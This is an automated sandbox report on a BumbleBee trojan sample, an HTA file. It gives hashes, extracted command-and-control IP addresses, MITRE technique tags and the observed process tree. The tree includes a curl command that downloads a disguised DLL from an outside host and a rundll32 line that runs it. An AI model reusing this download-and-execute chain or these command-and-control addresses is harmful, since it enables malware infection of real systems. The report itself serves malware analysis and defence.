bumblebee | 9a39db4d96024d05abf585b11d3b717a086241a59b70c7434e935edc33d66187

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
03/02/2023, 18:12

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

1.hta
Size

7KB
MD5

1e34928af180dc440e129469536ee21f
SHA1

6ae914196ddf8366a67f431d19e0812514e5c8e1
SHA256

9a39db4d96024d05abf585b11d3b717a086241a59b70c7434e935edc33d66187
SHA512

14b74efb4e6ee87de6f26f533631e971c5f188350620e472958f91a8eea96325a0bfe347b9da16d54c2b2316e57491d7d67579aec404a7f659558a63b678ff0c
SSDEEP

96:pNZrmf0Gf1jqDQejQnYJi/J591l5m9SVjNItGb928OgVrlLyIcoLu5CC:pnvIjqHih591l5Qeo2928OgJl/u3

Score

10^/10

bumblebee tokdll trojan

Malware Config

Extracted

Family

bumblebee

Botnet

tokdll

195.20.17.233:443

192.111.146.189:443

62.113.238.73:443

rc4.plain

Signatures

BumbleBee
BumbleBee is a webshell malware written in C++.
trojan bumblebee

Blocklisted process makes network request 6 IoCs

flow	pid	Process
49	3824	rundll32.exe
98	3824	rundll32.exe
100	3824	rundll32.exe
101	3824	rundll32.exe
102	3824	rundll32.exe
103	3824	rundll32.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	mshta.exe

Loads dropped DLL 2 IoCs

pid	Process
4156	rundll32.exe
3824	rundll32.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
3824	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 1 IoCs

evasion

pid	Process
4448	taskkill.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4448	taskkill.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 4528 wrote to memory of 4360	4528	mshta.exe	83
PID 4528 wrote to memory of 4360	4528	mshta.exe	83
PID 4528 wrote to memory of 4360	4528	mshta.exe	83
PID 4528 wrote to memory of 4156	4528	mshta.exe	85
PID 4528 wrote to memory of 4156	4528	mshta.exe	85
PID 4528 wrote to memory of 4156	4528	mshta.exe	85
PID 4156 wrote to memory of 3824	4156	rundll32.exe	86
PID 4156 wrote to memory of 3824	4156	rundll32.exe	86
PID 4528 wrote to memory of 4448	4528	mshta.exe	87
PID 4528 wrote to memory of 4448	4528	mshta.exe	87
PID 4528 wrote to memory of 4448	4528	mshta.exe	87

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4528
- C:\Windows\SysWOW64\curl.exe
  "C:\Windows\System32\curl.exe" --output C:\ProgramData\a3bH986.png --url http://avalon-meta.com/view.png
  2⤵
  PID:4360
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\ProgramData\a3bH986.png,Cpurthnvlc
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4156
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\ProgramData\a3bH986.png,Cpurthnvlc
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious use of NtCreateThreadExHideFromDebugger
    PID:3824
- C:\Windows\SysWOW64\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /f /im mshta.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:4448

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\a3bH986.png

Filesize
903KB

MD5
a740177df6f2918373d4e6f482b8c2e3

SHA1
4501edd7904033cfdee783c03af2df0db935be30

SHA256
51bb71bd446bd7fc03cc1234fcc3f489f10db44e312c9ce619b937fad6912656

SHA512
ec45deeffd340dafecd065d22823df9a6f7e3cbc03e64316b6b7433f051a060c610e2c2d3df03d33966b05b03183af56074cc81a8383bcbf8fb0e61dc22dad73

Download Submit
C:\ProgramData\a3bH986.png

Filesize
903KB

MD5
a740177df6f2918373d4e6f482b8c2e3

SHA1
4501edd7904033cfdee783c03af2df0db935be30

SHA256
51bb71bd446bd7fc03cc1234fcc3f489f10db44e312c9ce619b937fad6912656

SHA512
ec45deeffd340dafecd065d22823df9a6f7e3cbc03e64316b6b7433f051a060c610e2c2d3df03d33966b05b03183af56074cc81a8383bcbf8fb0e61dc22dad73

Download Submit
C:\ProgramData\a3bH986.png

Filesize
903KB

MD5
a740177df6f2918373d4e6f482b8c2e3

SHA1
4501edd7904033cfdee783c03af2df0db935be30

SHA256
51bb71bd446bd7fc03cc1234fcc3f489f10db44e312c9ce619b937fad6912656

SHA512
ec45deeffd340dafecd065d22823df9a6f7e3cbc03e64316b6b7433f051a060c610e2c2d3df03d33966b05b03183af56074cc81a8383bcbf8fb0e61dc22dad73

Download Submit
memory/3824-139-0x000001F416E70000-0x000001F416EEE000-memory.dmp

Filesize
504KB

Download
memory/3824-140-0x000001F417090000-0x000001F4171F1000-memory.dmp

Filesize
1.4MB

Download
memory/3824-141-0x000001F416E70000-0x000001F416EEE000-memory.dmp

Filesize
504KB

Download